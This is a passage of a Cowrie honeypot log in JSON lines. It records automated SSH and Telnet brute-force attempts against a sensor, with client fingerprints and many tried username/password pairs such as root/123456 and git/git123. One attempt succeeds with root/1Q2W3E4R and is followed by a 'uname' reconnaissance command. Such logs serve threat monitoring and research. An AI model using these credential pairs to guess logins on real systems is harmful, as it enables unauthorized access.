{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:18.752340Z","src_ip":"45.119.84.54","session":"655feb9f0a37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47936,"dst_ip":"1.2.3.4","dst_port":22,"session":"72c393db6aaf","protocol":"ssh","message":"New connection: 212.227.235.229:47936 (1.2.3.4:22) [session: 72c393db6aaf]","sensor":"my-vps","timestamp":"2025-08-28T06:36:22.533226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:22.536288Z","src_ip":"212.227.235.229","session":"72c393db6aaf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:22.785787Z","src_ip":"212.227.235.229","session":"72c393db6aaf"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:23.793750Z","src_ip":"212.227.235.229","session":"72c393db6aaf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:25.048789Z","src_ip":"212.227.235.229","session":"72c393db6aaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38780,"dst_ip":"1.2.3.4","dst_port":22,"session":"b86f3372f8f0","protocol":"ssh","message":"New connection: 212.227.125.160:38780 (1.2.3.4:22) [session: b86f3372f8f0]","sensor":"my-vps","timestamp":"2025-08-28T06:36:32.389521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:32.417130Z","src_ip":"212.227.125.160","session":"b86f3372f8f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:32.616700Z","src_ip":"212.227.125.160","session":"b86f3372f8f0"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:33.540195Z","src_ip":"212.227.125.160","session":"b86f3372f8f0"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:34.769440Z","src_ip":"212.227.125.160","session":"b86f3372f8f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43723,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5d8ff8a5441","protocol":"ssh","message":"New connection: 212.227.235.229:43723 (1.2.3.4:22) [session: f5d8ff8a5441]","sensor":"my-vps","timestamp":"2025-08-28T06:36:37.783646Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:38.161390Z","src_ip":"212.227.235.229","session":"f5d8ff8a5441"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44592,"dst_ip":"1.2.3.4","dst_port":22,"session":"7badf9b6db30","protocol":"ssh","message":"New connection: 212.227.235.229:44592 (1.2.3.4:22) [session: 7badf9b6db30]","sensor":"my-vps","timestamp":"2025-08-28T06:36:38.874727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:38.876419Z","src_ip":"212.227.235.229","session":"7badf9b6db30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:39.124851Z","src_ip":"212.227.235.229","session":"7badf9b6db30"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:39.872502Z","src_ip":"212.227.235.229","session":"7badf9b6db30"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:41.123162Z","src_ip":"212.227.235.229","session":"7badf9b6db30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46030,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0700001a3d4","protocol":"telnet","message":"New connection: 212.227.235.229:46030 (1.2.3.4:23) [session: d0700001a3d4]","sensor":"my-vps","timestamp":"2025-08-28T06:36:46.092576Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46054,"dst_ip":"1.2.3.4","dst_port":23,"session":"f4d4e9ec1c8f","protocol":"telnet","message":"New connection: 212.227.235.229:46054 (1.2.3.4:23) [session: f4d4e9ec1c8f]","sensor":"my-vps","timestamp":"2025-08-28T06:36:48.310778Z"}
{"eventid":"cowrie.session.closed","duration":0.002443552017211914,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:48.313152Z","src_ip":"212.227.235.229","session":"f4d4e9ec1c8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32796,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bb258e4b739","protocol":"ssh","message":"New connection: 212.227.125.160:32796 (1.2.3.4:22) [session: 7bb258e4b739]","sensor":"my-vps","timestamp":"2025-08-28T06:36:48.614827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:48.636229Z","src_ip":"212.227.125.160","session":"7bb258e4b739"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:48.843993Z","src_ip":"212.227.125.160","session":"7bb258e4b739"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:49.709666Z","src_ip":"212.227.125.160","session":"7bb258e4b739"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:50.929848Z","src_ip":"212.227.125.160","session":"7bb258e4b739"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47718,"dst_ip":"1.2.3.4","dst_port":22,"session":"42506ac56ce2","protocol":"ssh","message":"New connection: 212.227.235.229:47718 (1.2.3.4:22) [session: 42506ac56ce2]","sensor":"my-vps","timestamp":"2025-08-28T06:36:55.200994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:36:55.201693Z","src_ip":"212.227.235.229","session":"42506ac56ce2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:36:55.454302Z","src_ip":"212.227.235.229","session":"42506ac56ce2"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:36:56.210422Z","src_ip":"212.227.235.229","session":"42506ac56ce2"}
{"eventid":"cowrie.session.closed","duration":10.170297145843506,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:56.262800Z","src_ip":"212.227.235.229","session":"d0700001a3d4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:57.464099Z","src_ip":"212.227.235.229","session":"42506ac56ce2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44014,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbc5cec4a6a9","protocol":"telnet","message":"New connection: 212.227.125.160:44014 (1.2.3.4:23) [session: bbc5cec4a6a9]","sensor":"my-vps","timestamp":"2025-08-28T06:36:57.527911Z"}
{"eventid":"cowrie.session.closed","duration":0.001203298568725586,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:36:57.529038Z","src_ip":"212.227.125.160","session":"bbc5cec4a6a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44030,"dst_ip":"1.2.3.4","dst_port":23,"session":"4398ea11e883","protocol":"telnet","message":"New connection: 212.227.125.160:44030 (1.2.3.4:23) [session: 4398ea11e883]","sensor":"my-vps","timestamp":"2025-08-28T06:36:57.546444Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63406,"dst_ip":"1.2.3.4","dst_port":22,"session":"055f745d3413","protocol":"ssh","message":"New connection: 212.227.235.229:63406 (1.2.3.4:22) [session: 055f745d3413]","sensor":"my-vps","timestamp":"2025-08-28T06:37:04.660605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:37:04.661348Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:37:04.790158Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51372,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c77037d418","protocol":"ssh","message":"New connection: 212.227.125.160:51372 (1.2.3.4:22) [session: b3c77037d418]","sensor":"my-vps","timestamp":"2025-08-28T06:37:05.152713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:05.161960Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:05.371892Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.login.failed","username":"user","password":"kaktus","message":"login attempt [user/kaktus] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:05.388859Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:37:06.249871Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.login.failed","username":"user","password":"harder","message":"login attempt [user/harder] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:06.543580Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:37:07.297012Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:37:07.297922Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:07.518891Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:07.520542Z","src_ip":"212.227.125.160","session":"b3c77037d418"}
{"eventid":"cowrie.session.closed","duration":10.119552373886108,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:07.665942Z","src_ip":"212.227.125.160","session":"4398ea11e883"}
{"eventid":"cowrie.login.failed","username":"user","password":"eduard","message":"login attempt [user/eduard] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:07.756465Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.login.failed","username":"user","password":"dylan","message":"login attempt [user/dylan] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:08.906871Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.login.failed","username":"user","password":"dead","message":"login attempt [user/dead] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:10.046579Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.session.connect","src_ip":"61.72.55.130","src_port":49570,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0b64a2b8609","protocol":"ssh","message":"New connection: 61.72.55.130:49570 (1.2.3.4:22) [session: b0b64a2b8609]","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.104791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.105679Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.179136Z","src_ip":"212.227.235.229","session":"055f745d3413"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.398907Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52946,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa861ad64b96","protocol":"ssh","message":"New connection: 212.227.235.229:52946 (1.2.3.4:22) [session: aa861ad64b96]","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.642086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.644052Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"e